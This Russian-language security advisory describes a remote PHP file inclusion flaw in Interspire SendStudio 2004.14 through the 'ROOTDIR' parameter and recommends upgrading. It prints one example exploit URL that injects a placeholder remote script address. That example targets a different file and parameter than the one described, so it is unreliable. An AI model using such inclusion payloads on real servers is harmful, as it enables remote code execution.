PHP-инклюдинг в Interspire SendStudio

Дата публикации:
22.02.2007
Дата изменения:
24.03.2009
Всего просмотров:
3369
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Interspire SendStudio 2004.x
Уязвимые версии: Interspire SendStudio 2004.14, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "ROOTDIR" в сценариях admin/includes/createemails.inc.php и admin/includes/send_emails.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

URL производителя: www.interspire.com/sendstudio/

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: SendStudio <= 2004.14 Remote File Inclusion Vulnerability

или введите имя

CAPTCHA